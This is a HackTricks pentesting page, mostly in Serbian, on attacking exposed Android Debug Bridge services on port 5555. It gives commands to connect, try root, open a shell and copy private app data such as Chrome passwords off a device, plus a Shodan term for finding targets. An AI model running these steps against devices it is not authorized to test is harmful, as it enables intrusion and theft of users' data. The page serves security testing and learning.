hacktricks/network-services-pentesting/5555-android-debug-bridge.md

5555 - Android Debug Bridge

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

{% endhint %}

Basic Information

From the docs:

Android Debug Bridge (adb) je svestran alat za komandnu liniju koji vam omogućava komunikaciju sa uređajem. adb komanda olakšava razne radnje na uređaju, kao što su instalacija i debagovanje aplikacija, i pruža pristup Unix shell-u koji možete koristiti za izvršavanje raznih komandi na uređaju.

Podrazumevani port: 5555.

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

Connect

Ako pronađete ADB servis koji radi na portu uređaja i možete se povezati na njega, možete dobiti shell unutar sistema:

adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

Za više ADB komandi proverite sledeću stranicu:

{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}

Ispis podataka aplikacije

Da biste potpuno preuzeli podatke aplikacije, možete:

# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

Možete koristiti ovu trik da dobijete osetljive informacije kao što su chrome lozinke. Za više informacija o ovome proverite informacije u referencama ovde.

Shodan

• android debug bridge

{% hint style="success" %} Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Podržite HackTricks

• Proverite planove pretplate!
• Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
• Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

{% endhint %}